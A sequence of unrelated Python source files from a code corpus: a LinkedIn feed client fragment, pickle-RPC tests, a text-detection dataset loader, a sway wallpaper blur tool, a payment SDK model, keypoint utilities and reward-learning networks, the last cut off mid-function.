(limit > -1 and len(l_urns) >= limit) # if our results exceed set limit
or len(l_urns) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(l_raw_urns) == 0:
break
self.logger.debug(f"results grew to {len(l_urns)}")
return l_posts, l_urns
def get_feed_posts(self, limit=-1, offset=0, exclude_promoted_posts=True):
"""Get a list of URNs from feed sorted by 'Recent'
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:param exclude_promoted_posts: Exclude from the output promoted posts
:type exclude_promoted_posts: bool, optional
        :return: List of feed posts
:rtype: list
"""
l_posts, l_urns = self._get_list_feed_posts_and_list_feed_urns(
limit, offset, exclude_promoted_posts
)
return get_list_posts_sorted_without_promoted(l_urns, l_posts)
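# A minimal end-to-end sketch, assuming credentials are supplied through the
# (made-up) LINKEDIN_USER / LINKEDIN_PASSWORD environment variables and that
# feed posts expose "author_name" and "url" fields; guarded so it only runs
# when this module is executed directly.
if __name__ == "__main__":
    import os

    api = Linkedin(os.environ["LINKEDIN_USER"], os.environ["LINKEDIN_PASSWORD"])
    for post in api.get_feed_posts(limit=5):
        print(post.get("author_name"), post.get("url"))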
|
py | 7dfff6405b457bedde49d5db39e70d3c5b0e02ff | import logging
import time
from threading import Thread
import pytest
from picklerpc import PickleRpcClient, PickleRpcServer
log = logging.getLogger()
@pytest.fixture
def client():
return PickleRpcClient('127.0.0.1', 62000, protocol=2)
@pytest.fixture
def server():
# Create a new subclass with a ping method.
class Pinger(PickleRpcServer):
"""Example class"""
def __init__(self, host='0.0.0.0', port=62000, protocol=None):
"""Prepare a Pinger for use."""
super(Pinger, self).__init__(host=host, port=port, protocol=protocol)
self.name = 'foo'
def ping(self):
"""
        Returns PONG, just for testing.
Returns (str):
PONG.
"""
return 'PONG'
def echo(self, message):
"""
Responds back to the caller.
Args:
message (str): Message to receive.
Returns (str):
Response.
"""
self._log.debug('Hey, we got a message: %r', message)
return 'I received: {}'.format(message)
def story(self, food='cheese', effect='moldy'):
"""
Responds back to the caller with food.
Args:
food (str): Food to work with.
effect (str): What food does.
Returns (str):
Response.
"""
self._log.debug('We got food=%s and effect=%s', food, effect)
return 'The {} is {}'.format(food, effect)
def raise_exception(self):
"""
Just raises an exception.
Raises:
NotImplementedError: Just because.
"""
raise NotImplementedError('Foo!')
# Start the server and run it for 2 minutes.
return Pinger(protocol=2)
def test_server_init(server):
assert server
def test_server_running(server):
def waiter():
stop_at = time.time() + 10
log.info('Looking for svr_running for at least 10 seconds.')
while time.time() < stop_at:
if server.svr_running:
log.info('Found it.')
return True
time.sleep(0.1)
else:
log.info('Not found in time.')
return False
assert not server.svr_running
waiter = Thread(target=waiter)
waiter.start()
server.run(1)
assert waiter
assert not server.svr_running
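# A hedged sketch of a full round trip, assuming PickleRpcClient exposes the
# server's methods as plain attribute calls (e.g. `client.ping()`); that call
# convention is an assumption, so this helper is deliberately not named like a
# test and will not be collected by pytest.
def example_round_trip(server, client):
    """Run the server briefly in a background thread and call ping() on it."""
    background = Thread(target=server.run, args=(5,))
    background.start()
    try:
        return client.ping()  # expected to be 'PONG' if the assumption holds
    finally:
        background.join()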
|
py | 7dfff675f738869f840902d3c3907c3c05f8bd19 | import os
import json
import numpy as np
import cv2
from PIL import Image
from numpy.random.mtrand import rand
import torch
from torch.utils import data
import torchvision.transforms as transforms
import Polygon as plg
import random
import pyclipper
from functools import reduce
from dataset.pan_pp.charset import charset
benchmark_root_path = "../datasets"
benchmark_pretrain_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_pretrain")
benchmark_train_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_train")
benchmark_val_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_val")
benchmark_test_gt_dir = os.path.join(benchmark_root_path, "annotations_separate/full_test")
down_sample_rate = 4
def get_img(img_path, read_type='pil'):
try:
if read_type == 'cv2':
img = cv2.imread(img_path)
if img is None:
print('Cannot read image: %s.' % img_path)
raise
img = img[:, :, [2, 1, 0]]
elif read_type == 'pil':
img = np.array(Image.open(img_path))
except Exception:
print('Cannot read image: %s.' % img_path)
raise
return img
def get_location(box, is_accept_poly):
poly = box['poly']
quad = box['quad']
xywh_rect = box['xywh_rect']
if not is_accept_poly:
poly = []
if len(poly) > 0 and len(poly)%2 == 0:
loc = reduce(lambda x, y: x + y, poly)
elif len(quad) == 8:
loc = quad
elif len(xywh_rect) == 4:
x, y, w, h = xywh_rect
loc = [x, y, x+w, y, x+w, y+h, x, y+h]
else:
loc = None
return loc
def get_ann(img, gt):
h, w = img.shape[0:2]
bboxes = []
words = []
for granularity in gt['annotations']:
for box in gt['annotations'][granularity]:
if box['anno_cat'] != 'standard':
continue
loc = get_location(box, True)
if loc is None:
continue
word = box['transcript']
if box['ignore'] == 1:
words.append('###')
else:
words.append(word)
# bbox = np.array(loc) / ([w * 1.0, h * 1.0] * 4)
            bbox = np.array(loc, dtype=np.float64)
bbox[::2] /= w * 1.0
bbox[1::2] /= h * 1.0
bboxes.append(bbox)
return bboxes, words
def random_rotate(imgs):
max_angle = 10
angle = random.random() * 2 * max_angle - max_angle
for i in range(len(imgs)):
img = imgs[i]
w, h = img.shape[:2]
rotation_matrix = cv2.getRotationMatrix2D((h / 2, w / 2), angle, 1)
img_rotation = cv2.warpAffine(img,
rotation_matrix, (h, w),
flags=cv2.INTER_NEAREST)
imgs[i] = img_rotation
return imgs
def random_scale(img, min_sizes, max_sizes):
min_size = random.choice(min_sizes)
max_size = random.choice(max_sizes)
h, w = img.shape[:2]
scale = min_size / min(w, h)
if h < w:
neww, newh = scale * w, min_size
else:
neww, newh = min_size, scale * h
if max(neww, newh) > max_size:
scale = max_size / max(neww, newh)
neww = neww * scale
newh = newh * scale
    neww = int(round(neww / 32.) * 32.)
    newh = int(round(newh / 32.) * 32.)
img = cv2.resize(img, dsize=(neww, newh))
return img
def random_crop_padding(imgs, target_size):
h, w = imgs[0].shape[0:2]
t_w, t_h = target_size
p_w, p_h = target_size
if w == t_w and h == t_h:
return imgs
t_h = t_h if t_h < h else h
t_w = t_w if t_w < w else w
if random.random() > 3.0 / 8.0 and np.max(imgs[1]) > 0:
# make sure to crop the text region
tl = np.min(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)
tl[tl < 0] = 0
br = np.max(np.where(imgs[1] > 0), axis=1) - (t_h, t_w)
br[br < 0] = 0
br[0] = min(br[0], h - t_h)
br[1] = min(br[1], w - t_w)
i = random.randint(tl[0], br[0]) if tl[0] < br[0] else 0
j = random.randint(tl[1], br[1]) if tl[1] < br[1] else 0
else:
i = random.randint(0, h - t_h) if h - t_h > 0 else 0
j = random.randint(0, w - t_w) if w - t_w > 0 else 0
n_imgs = []
for idx in range(len(imgs)):
if len(imgs[idx].shape) == 3:
s3_length = int(imgs[idx].shape[-1])
img = imgs[idx][i:i + t_h, j:j + t_w, :]
img_p = cv2.copyMakeBorder(img,
0,
p_h - t_h,
0,
p_w - t_w,
borderType=cv2.BORDER_CONSTANT,
value=tuple(0
for i in range(s3_length)))
else:
img = imgs[idx][i:i + t_h, j:j + t_w]
img_p = cv2.copyMakeBorder(img,
0,
p_h - t_h,
0,
p_w - t_w,
borderType=cv2.BORDER_CONSTANT,
value=(0, ))
n_imgs.append(img_p)
return n_imgs
def update_word_mask(instance, instance_before_crop, word_mask):
labels = np.unique(instance)
for label in labels:
if label == 0:
continue
ind = instance == label
if np.sum(ind) == 0:
word_mask[label] = 0
continue
ind_before_crop = instance_before_crop == label
# print(np.sum(ind), np.sum(ind_before_crop))
if float(np.sum(ind)) / np.sum(ind_before_crop) > 0.9:
continue
word_mask[label] = 0
return word_mask
def dist(a, b):
return np.linalg.norm((a - b), ord=2, axis=0)
def perimeter(bbox):
peri = 0.0
for i in range(bbox.shape[0]):
peri += dist(bbox[i], bbox[(i + 1) % bbox.shape[0]])
return peri
def shrink(bboxes, rate, max_shr=20):
rate = rate * rate
shrinked_bboxes = []
for bbox in bboxes:
area = plg.Polygon(bbox).area()
peri = perimeter(bbox)
try:
pco = pyclipper.PyclipperOffset()
pco.AddPath(bbox, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
offset = min(int(area * (1 - rate) / (peri + 0.001) + 0.5),
max_shr)
shrinked_bbox = pco.Execute(-offset)
if len(shrinked_bbox) == 0:
shrinked_bboxes.append(bbox)
continue
shrinked_bbox = np.array(shrinked_bbox)[0]
if shrinked_bbox.shape[0] <= 2:
shrinked_bboxes.append(bbox)
continue
shrinked_bboxes.append(shrinked_bbox)
except Exception:
print('area:', area, 'peri:', peri)
shrinked_bboxes.append(bbox)
return shrinked_bboxes
def get_vocabulary(EOS='EOS', PADDING='PAD', UNKNOWN='UNK'):
voc = list(charset)
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
char2id = dict(zip(voc, range(len(voc))))
id2char = dict(zip(range(len(voc)), voc))
return voc, char2id, id2char
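# A minimal sketch of how the vocabulary maps a transcript to an id sequence,
# mirroring the encoding loop in prepare_train_data below; the helper name is
# illustrative and not used elsewhere in this module.
def _encode_word_example(word, max_word_len=32):
    _, char2id, _ = get_vocabulary()
    gt_word = np.full((max_word_len, ), char2id['PAD'], dtype=np.int32)
    for j, char in enumerate(word[:max_word_len - 1]):
        gt_word[j] = char2id.get(char, char2id['UNK'])
    gt_word[min(len(word), max_word_len - 1)] = char2id['EOS']
    return gt_word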
class PAN_PP_BENCHMARK(data.Dataset):
def __init__(self,
split=("train", ),
is_train=True,
is_transform=False,
img_size=None,
min_sizes=(640, 672, 704),
max_sizes=(1600, ),
kernel_scale=0.5,
with_rec=False,
read_type='pil',
report_speed=False):
self.split = split
self.is_train = is_train
self.is_transform = is_transform
self.img_size = img_size if (
img_size is None or isinstance(img_size, tuple)) else (img_size,
img_size)
self.min_sizes = min_sizes
self.max_sizes = max_sizes
self.kernel_scale = kernel_scale
self.with_rec = with_rec
self.read_type = read_type
gt_dirs = []
if "pretrain" in split:
gt_dirs.append(benchmark_pretrain_gt_dir)
if "train" in split:
gt_dirs.append(benchmark_train_gt_dir)
if "val" in split:
gt_dirs.append(benchmark_val_gt_dir)
if "test" in split:
gt_dirs.append(benchmark_test_gt_dir)
if len(gt_dirs) <= 0:
print('Error: split must be pretrain, train, val or test!')
raise
self.gt_paths = []
for gt_dir in gt_dirs:
gt_names = os.listdir(gt_dir)
self.gt_paths += list(map(lambda x: os.path.join(gt_dir, x), gt_names))
if report_speed:
target_size = 3000
extend_scale = (target_size + len(self.gt_paths) - 1) // len(
self.gt_paths)
self.gt_paths = (self.gt_paths * extend_scale)[:target_size]
self.voc, self.char2id, self.id2char = get_vocabulary()
self.max_word_num = 200
self.max_word_len = 32
print('reading type: %s.' % self.read_type)
def __len__(self):
return len(self.gt_paths)
def prepare_train_data(self, index):
gt_path = self.gt_paths[index]
f_gt = open(gt_path, "r")
gt = json.load(f_gt)
f_gt.close()
img = get_img(os.path.join(benchmark_root_path, gt['name']))
bboxes, words = get_ann(img, gt)
if len(bboxes) > self.max_word_num:
bboxes = bboxes[:self.max_word_num]
words = words[:self.max_word_num]
gt_words = np.full((self.max_word_num + 1, self.max_word_len),
self.char2id['PAD'],
dtype=np.int32)
word_mask = np.zeros((self.max_word_num + 1, ), dtype=np.int32)
for i, word in enumerate(words):
if word == '###':
continue
            gt_word = np.full((self.max_word_len, ),
                              self.char2id['PAD'],
                              dtype=np.int32)
for j, char in enumerate(word):
if j > self.max_word_len - 1:
break
if char in self.char2id:
gt_word[j] = self.char2id[char]
else:
gt_word[j] = self.char2id['UNK']
if len(word) > self.max_word_len - 1:
gt_word[-1] = self.char2id['EOS']
else:
gt_word[len(word)] = self.char2id['EOS']
gt_words[i + 1] = gt_word
word_mask[i + 1] = 1
if self.is_transform:
img = random_scale(img, self.min_sizes, self.max_sizes)
gt_instance = np.zeros(img.shape[0:2], dtype='uint8')
training_mask = np.ones(img.shape[0:2], dtype='uint8')
if len(bboxes) > 0:
for i in range(len(bboxes)):
bboxes[i][::2] *= img.shape[1]
bboxes[i][1::2] *= img.shape[0]
bboxes[i] = bboxes[i].astype(np.int32).reshape(-1, 2)
cv2.drawContours(gt_instance, [bboxes[i]], -1, i + 1, -1)
if words[i] == '###':
cv2.drawContours(training_mask, [bboxes[i]], -1, 0, -1)
gt_kernels = []
for rate in [self.kernel_scale]:
gt_kernel = np.zeros(img.shape[0:2], dtype=np.uint8)
kernel_bboxes = shrink(bboxes, rate)
for i in range(len(bboxes)):
cv2.drawContours(gt_kernel, [kernel_bboxes[i]], -1, 1, -1)
gt_kernels.append(gt_kernel)
if self.is_transform:
imgs = [img, gt_instance, training_mask]
imgs.extend(gt_kernels)
imgs = random_rotate(imgs)
gt_instance_before_crop = imgs[1].copy()
imgs = random_crop_padding(imgs, self.img_size)
img, gt_instance, training_mask, gt_kernels = imgs[0], imgs[
1], imgs[2], imgs[3:]
word_mask = update_word_mask(gt_instance, gt_instance_before_crop,
word_mask)
gt_text = gt_instance.copy()
gt_text[gt_text > 0] = 1
gt_kernels = np.array(gt_kernels)
max_instance = np.max(gt_instance)
gt_bboxes = np.zeros((self.max_word_num + 1, 4), dtype=np.int32)
for i in range(1, max_instance + 1):
ind = gt_instance == i
if np.sum(ind) == 0:
continue
points = np.array(np.where(ind)).transpose((1, 0))
tl = np.min(points, axis=0)
br = np.max(points, axis=0) + 1
gt_bboxes[i] = (tl[0], tl[1], br[0], br[1])
img = Image.fromarray(img)
img = img.convert('RGB')
if self.is_transform:
img = transforms.ColorJitter(brightness=32.0 / 255,
saturation=0.5)(img)
img = transforms.ToTensor()(img)
img = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])(img)
gt_text = torch.from_numpy(gt_text).long()
gt_kernels = torch.from_numpy(gt_kernels).long()
training_mask = torch.from_numpy(training_mask).long()
gt_instance = torch.from_numpy(gt_instance).long()
gt_bboxes = torch.from_numpy(gt_bboxes).long()
gt_words = torch.from_numpy(gt_words).long()
word_mask = torch.from_numpy(word_mask).long()
data = dict(
imgs=img,
gt_texts=gt_text,
gt_kernels=gt_kernels,
training_masks=training_mask,
gt_instances=gt_instance,
gt_bboxes=gt_bboxes,
)
if self.with_rec:
data.update(dict(gt_words=gt_words, word_masks=word_mask))
return data
def prepare_test_data(self, index):
gt_path = self.gt_paths[index]
f_gt = open(gt_path, "r")
gt = json.load(f_gt)
f_gt.close()
img = get_img(os.path.join(benchmark_root_path, gt['name']))
img_meta = dict(org_img_size=np.array(img.shape[:2]))
img = random_scale(img, self.min_sizes, self.max_sizes)
img_meta.update(dict(img_size=np.array(img.shape[:2])))
img = Image.fromarray(img)
img = img.convert('RGB')
img = transforms.ToTensor()(img)
img = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])(img)
data = dict(imgs=img, img_metas=img_meta)
return data
def __getitem__(self, index):
if self.is_train:
return self.prepare_train_data(index)
else:
return self.prepare_test_data(index)
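# A minimal usage sketch, assuming the benchmark annotation folders and images
# configured above exist on disk; guarded so importing this module stays
# side-effect free.
if __name__ == '__main__':
    loader = data.DataLoader(
        PAN_PP_BENCHMARK(split=('train', ), is_transform=True,
                         img_size=640, with_rec=True),
        batch_size=2,
        shuffle=True,
        num_workers=0,
    )
    for batch in loader:
        print(batch['imgs'].shape, batch['gt_texts'].shape)
        break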
|
py | 7dfff70983b49f8d0d640b9ff76d6e39e47e41b2 | import multiprocessing
import subprocess
import filecmp
import shutil
import hashlib
import logging
import os.path
import i3ipc
from swayblur import paths
from swayblur.output import Output
def genBlurredImage(inputPath: str, outputPath: str, blurLevel: int) -> None:
try:
subprocess.run(['convert', inputPath, '-blur', '0x%d' % blurLevel, outputPath])
except FileNotFoundError:
logging.error('Could not create blurred version of wallpaper, ensure imagemagick is installed')
exit()
logging.info('Generated image %s' % outputPath)
def verifyWallpaperCache(wallpaperPath: str, wallpaperHash: str) -> bool:
cachedWallpaper = paths.cachedImagePath(wallpaperPath, wallpaperHash)
if paths.exists(cachedWallpaper) and filecmp.cmp(wallpaperPath, cachedWallpaper):
logging.info('wallpaper %s is cached as %s' % (wallpaperPath, cachedWallpaper))
return True
logging.info('wallpaper %s added to the cache as %s' % (wallpaperPath, cachedWallpaper))
shutil.copy(wallpaperPath, cachedWallpaper)
return False
class BlurManager:
def __init__(self, outputConfigs: dict, blurStrength: int, animationDuration: int) -> None:
self.SWAY = i3ipc.Connection()
self.outputs = {}
animationFrames = [
(i + 1) * (blurStrength // animationDuration) for i in range(animationDuration)
]
# create an output object for each output in the configuration
for name in outputConfigs:
outputCfg = outputConfigs[name]
outputWallpaper = os.path.expanduser(
os.path.expandvars(outputCfg['image'])
)
if not outputWallpaper: # if output has no wallpaper
self.outputs[name] = Output(name, '', [], {})
continue
imageHash = hashlib.md5(outputWallpaper.encode()).hexdigest()
cachedImage = paths.cachedImagePath(outputWallpaper, imageHash)
self.outputs[name] = Output(
name,
cachedImage,
[paths.framePath(imageHash, frame) for frame in animationFrames],
{
                    'filter': outputCfg['filter'],
'anchor': outputCfg['anchor'],
'scaling-mode': outputCfg['scaling-mode'],
}
)
# check if new wallpaper must be generated
if not verifyWallpaperCache(outputWallpaper, imageHash):
print('Generating blurred wallpaper frames')
print('This may take a minute...')
with multiprocessing.Pool() as pool:
pool.starmap(
genBlurredImage,
[[cachedImage, paths.framePath(imageHash, frame), frame] for frame in animationFrames]
)
print('Blurred wallpaper generated for %s' % name)
else:
print('Blurred wallpaper exists for %s' % name)
def start(self) -> None:
# initially blur populated workspaces
for workspace in self.SWAY.get_workspaces():
if workspace.visible and workspace.ipc_data['focus']:
self.outputs[workspace.ipc_data['output']].blur()
print("Listening...")
self.SWAY.on(i3ipc.Event.WINDOW_MOVE, self.handleMove)
self.SWAY.on(i3ipc.Event.WINDOW_NEW, self.handleNew)
self.SWAY.on(i3ipc.Event.WINDOW_CLOSE, self.handleClose)
self.SWAY.on(i3ipc.Event.WORKSPACE_FOCUS, self.handleFocus)
self.SWAY.main()
def handleMove(self, _: i3ipc.Connection, event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_by_id(event.ipc_data['container']['id'])
containerOutput = ''
focusedContainer = self.SWAY.get_tree().find_focused()
focusedOutput = focusedContainer.workspace().ipc_data['output']
try:
containerOutput = container.workspace().ipc_data['output']
except KeyError: # case when moved to scratchpad, deal with focused output
if focusedContainer == focusedContainer.workspace(): # if workspace empty
self.outputs[focusedOutput].unblur()
return
except AttributeError: # case where a previously scratchpadded window is closed
# it doesn't make sense that closing a previously scratchpadded window
# would be a WINDOW_MOVE event to me either, but it is what it is
return
# window moved to a workspace on a different output
if container != focusedContainer:
self.outputs[containerOutput].blur()
if focusedContainer == focusedContainer.workspace(): # if workspace empty
self.outputs[focusedOutput].unblur()
# window moved to a new workspace on same output
elif container == container.workspace(): # if workspace is empty
self.outputs[containerOutput].unblur()
def handleNew(self, _: i3ipc.Connection, event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_by_id(event.ipc_data['container']['id'])
workspace = container.workspace()
self.outputs[workspace.ipc_data['output']].blur()
def handleClose(self, _: i3ipc.Connection, _event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_focused()
workspace = container.workspace()
if container == workspace: # if workspace is empty
self.outputs[workspace.ipc_data['output']].unblur()
def handleFocus(self, _: i3ipc.Connection, _event: i3ipc.Event) -> None:
container = self.SWAY.get_tree().find_focused()
workspace = container.workspace()
if container == workspace: # if workspace is empty
self.outputs[workspace.ipc_data['output']].unblur()
else:
self.outputs[workspace.ipc_data['output']].blur()
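# A hedged usage sketch: the output name, wallpaper path, option values and the
# blur strength / animation duration below are all made-up examples, not values
# defined by this module.
if __name__ == '__main__':
    example_config = {
        'eDP-1': {
            'image': '~/Pictures/wallpaper.png',
            'filter': 'lanczos3',
            'anchor': 'center',
            'scaling-mode': 'fill',
        },
    }
    BlurManager(example_config, 20, 10).start()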
|
py | 7dfff8504ce0d4a7f32f2a726800d45b6a9eaf50 | # -*- coding: utf-8 -*-
"""
pagarmeapisdk
This file was automatically generated by APIMATIC v3.0 (
https://www.apimatic.io ).
"""
from pagarmeapisdk.models.create_cancel_charge_split_rules_request import CreateCancelChargeSplitRulesRequest
from pagarmeapisdk.models.create_split_request import CreateSplitRequest
class CreateCancelChargeRequest(object):
"""Implementation of the 'CreateCancelChargeRequest' model.
Request for canceling a charge.
Attributes:
amount (int): The amount that will be canceled.
split_rules (list of CreateCancelChargeSplitRulesRequest): The split
rules request
split (list of CreateSplitRequest): Splits
operation_reference (string): TODO: type description here.
"""
# Create a mapping from Model property names to API property names
_names = {
"operation_reference": 'operation_reference',
"amount": 'amount',
"split_rules": 'split_rules',
"split": 'split'
}
def __init__(self,
operation_reference=None,
amount=None,
split_rules=None,
split=None):
"""Constructor for the CreateCancelChargeRequest class"""
# Initialize members of the class
self.amount = amount
self.split_rules = split_rules
self.split = split
self.operation_reference = operation_reference
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object
as obtained from the deserialization of the server's response. The
keys MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
operation_reference = dictionary.get('operation_reference')
amount = dictionary.get('amount')
split_rules = None
if dictionary.get('split_rules') is not None:
split_rules = [CreateCancelChargeSplitRulesRequest.from_dictionary(x) for x in dictionary.get('split_rules')]
split = None
if dictionary.get('split') is not None:
split = [CreateSplitRequest.from_dictionary(x) for x in dictionary.get('split')]
# Return an object of this model
return cls(operation_reference,
amount,
split_rules,
split)
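# A minimal sketch of building the model from an already-deserialized payload;
# the field values are made up and `split_rules`/`split` are simply omitted.
if __name__ == '__main__':
    example_payload = {
        'operation_reference': 'cancel-001',
        'amount': 1500,
    }
    request = CreateCancelChargeRequest.from_dictionary(example_payload)
    print(request.amount, request.operation_reference)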
|
py | 7dfff8a7544122efaa1ca68919993e43e3f54c27 | import torch
# transpose
FLIP_LEFT_RIGHT = 0
FLIP_TOP_BOTTOM = 1
class Keypoints(object):
def __init__(self, keypoints, size, mode=None):
# FIXME remove check once we have better integration with device
# in my version this would consistently return a CPU tensor
device = keypoints.device if isinstance(keypoints, torch.Tensor) else torch.device('cpu')
keypoints = torch.as_tensor(keypoints, dtype=torch.float32, device=device)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
# TODO should I split them?
# self.visibility = keypoints[..., 2]
self.keypoints = keypoints# [..., :2]
self.size = size
self.mode = mode
self.extra_fields = {}
def crop(self, box):
raise NotImplementedError()
def resize(self, size, *args, **kwargs):
ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(size, self.size))
ratio_w, ratio_h = ratios
resized_data = self.keypoints.clone()
resized_data[..., 0] *= ratio_w
resized_data[..., 1] *= ratio_h
keypoints = type(self)(resized_data, size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v)
return keypoints
def transpose(self, method):
if method not in (FLIP_LEFT_RIGHT,):
raise NotImplementedError(
"Only FLIP_LEFT_RIGHT implemented")
flip_inds = type(self).FLIP_INDS
flipped_data = self.keypoints[:, flip_inds]
width = self.size[0]
TO_REMOVE = 1
# Flip x coordinates
flipped_data[..., 0] = width - flipped_data[..., 0] - TO_REMOVE
# Maintain COCO convention that if visibility == 0, then x, y = 0
inds = flipped_data[..., 2] == 0
flipped_data[inds] = 0
keypoints = type(self)(flipped_data, self.size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v)
return keypoints
def to(self, *args, **kwargs):
keypoints = type(self)(self.keypoints.to(*args, **kwargs), self.size, self.mode)
for k, v in self.extra_fields.items():
if hasattr(v, "to"):
v = v.to(*args, **kwargs)
keypoints.add_field(k, v)
return keypoints
def __getitem__(self, item):
keypoints = type(self)(self.keypoints[item], self.size, self.mode)
for k, v in self.extra_fields.items():
keypoints.add_field(k, v[item])
return keypoints
def add_field(self, field, field_data):
self.extra_fields[field] = field_data
def get_field(self, field):
return self.extra_fields[field]
def __repr__(self):
s = self.__class__.__name__ + '('
s += 'num_instances={}, '.format(len(self.keypoints))
s += 'image_width={}, '.format(self.size[0])
s += 'image_height={})'.format(self.size[1])
return s
def _create_flip_indices(names, flip_map):
full_flip_map = flip_map.copy()
full_flip_map.update({v: k for k, v in flip_map.items()})
flipped_names = [i if i not in full_flip_map else full_flip_map[i] for i in names]
flip_indices = [names.index(i) for i in flipped_names]
return torch.tensor(flip_indices)
class PersonKeypoints(Keypoints):
NAMES = [
'nose',
'left_eye',
'right_eye',
'left_ear',
'right_ear',
'left_shoulder',
'right_shoulder',
'left_elbow',
'right_elbow',
'left_wrist',
'right_wrist',
'left_hip',
'right_hip',
'left_knee',
'right_knee',
'left_ankle',
'right_ankle'
]
FLIP_MAP = {
'left_eye': 'right_eye',
'left_ear': 'right_ear',
'left_shoulder': 'right_shoulder',
'left_elbow': 'right_elbow',
'left_wrist': 'right_wrist',
'left_hip': 'right_hip',
'left_knee': 'right_knee',
'left_ankle': 'right_ankle'
}
# TODO this doesn't look great
PersonKeypoints.FLIP_INDS = _create_flip_indices(PersonKeypoints.NAMES, PersonKeypoints.FLIP_MAP)
def kp_connections(keypoints):
kp_lines = [
[keypoints.index('left_eye'), keypoints.index('right_eye')],
[keypoints.index('left_eye'), keypoints.index('nose')],
[keypoints.index('right_eye'), keypoints.index('nose')],
[keypoints.index('right_eye'), keypoints.index('right_ear')],
[keypoints.index('left_eye'), keypoints.index('left_ear')],
[keypoints.index('right_shoulder'), keypoints.index('right_elbow')],
[keypoints.index('right_elbow'), keypoints.index('right_wrist')],
[keypoints.index('left_shoulder'), keypoints.index('left_elbow')],
[keypoints.index('left_elbow'), keypoints.index('left_wrist')],
[keypoints.index('right_hip'), keypoints.index('right_knee')],
[keypoints.index('right_knee'), keypoints.index('right_ankle')],
[keypoints.index('left_hip'), keypoints.index('left_knee')],
[keypoints.index('left_knee'), keypoints.index('left_ankle')],
[keypoints.index('right_shoulder'), keypoints.index('left_shoulder')],
[keypoints.index('right_hip'), keypoints.index('left_hip')],
]
return kp_lines
PersonKeypoints.CONNECTIONS = kp_connections(PersonKeypoints.NAMES)
# TODO make this nicer, this is a direct translation from C2 (but removing the inner loop)
def keypoints_to_heat_map(keypoints, rois, heatmap_size):
if rois.numel() == 0:
return rois.new().long(), rois.new().long()
offset_x = rois[:, 0]
offset_y = rois[:, 1]
scale_x = heatmap_size / (rois[:, 2] - rois[:, 0])
scale_y = heatmap_size / (rois[:, 3] - rois[:, 1])
offset_x = offset_x[:, None]
offset_y = offset_y[:, None]
scale_x = scale_x[:, None]
scale_y = scale_y[:, None]
x = keypoints[..., 0]
y = keypoints[..., 1]
x_boundary_inds = x == rois[:, 2][:, None]
y_boundary_inds = y == rois[:, 3][:, None]
x = (x - offset_x) * scale_x
x = x.floor().long()
y = (y - offset_y) * scale_y
y = y.floor().long()
x[x_boundary_inds] = heatmap_size - 1
y[y_boundary_inds] = heatmap_size - 1
valid_loc = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)
vis = keypoints[..., 2] > 0
valid = (valid_loc & vis).long()
lin_ind = y * heatmap_size + x
heatmaps = lin_ind * valid
return heatmaps, valid
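# A small usage sketch for keypoints_to_heat_map (added for illustration, not
# used by the library code above). Shapes follow the conventions in this file:
# `keypoints` is (num_instances, num_keypoints, 3) holding (x, y, visibility),
# `rois` is (num_instances, 4) boxes in xyxy format, and the function returns
# flattened heatmap indices together with a validity mask.
def _keypoints_to_heat_map_example():
    kps = torch.tensor([[[10.0, 20.0, 2.0], [30.0, 40.0, 0.0]]])  # one instance, two keypoints
    rois = torch.tensor([[0.0, 0.0, 56.0, 56.0]])                 # a single 56x56 box
    heatmaps, valid = keypoints_to_heat_map(kps, rois, heatmap_size=56)
    # heatmaps: tensor([[1130, 0]]); valid: tensor([[1, 0]]) -- the second
    # keypoint has visibility 0, so it is masked out.
    return heatmaps, valid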
|
py | 7dfff8ca3a5a7181b71c674652286f4fff0c3144 | import numpy as np
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
class TrexNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 16, 7, stride=3)
self.conv2 = nn.Conv2d(16, 16, 5, stride=2)
self.conv3 = nn.Conv2d(16, 16, 3, stride=1)
self.conv4 = nn.Conv2d(16, 16, 3, stride=1)
self.fc1 = nn.Linear(784, 64)
self.fc2 = nn.Linear(64, 1)
def forward(self, obs):
'''calculate cumulative return of trajectory'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 784)
#x = x.view(-1, 1936)
x = F.relu(self.fc1(x))
#r = torch.tanh(self.fc2(x)) #clip reward?
x = self.fc2(x)
return x
class MediumNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(4, 32, 5, stride=2)
self.conv2 = nn.Conv2d(32, 32, 5, stride=2)
self.conv3 = nn.Conv2d(32, 32, 3, stride=1)
self.conv4 = nn.Conv2d(32, 32, 3, stride=1)
self.fc1 = nn.Linear(6272, 1024)
#self.fc1 = nn.Linear(1936,64)
self.fc2 = nn.Linear(1024, 256)
self.fc3 = nn.Linear(256,1)
def forward(self, obs):
'''feed forward through network to get logits for binary reward classification'''
x = obs.permute(0,3,1,2) #get into NCHW format
#compute forward pass of reward network
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = F.relu(self.conv4(x))
x = x.view(-1, 6272)
#x = x.view(-1, 1936)
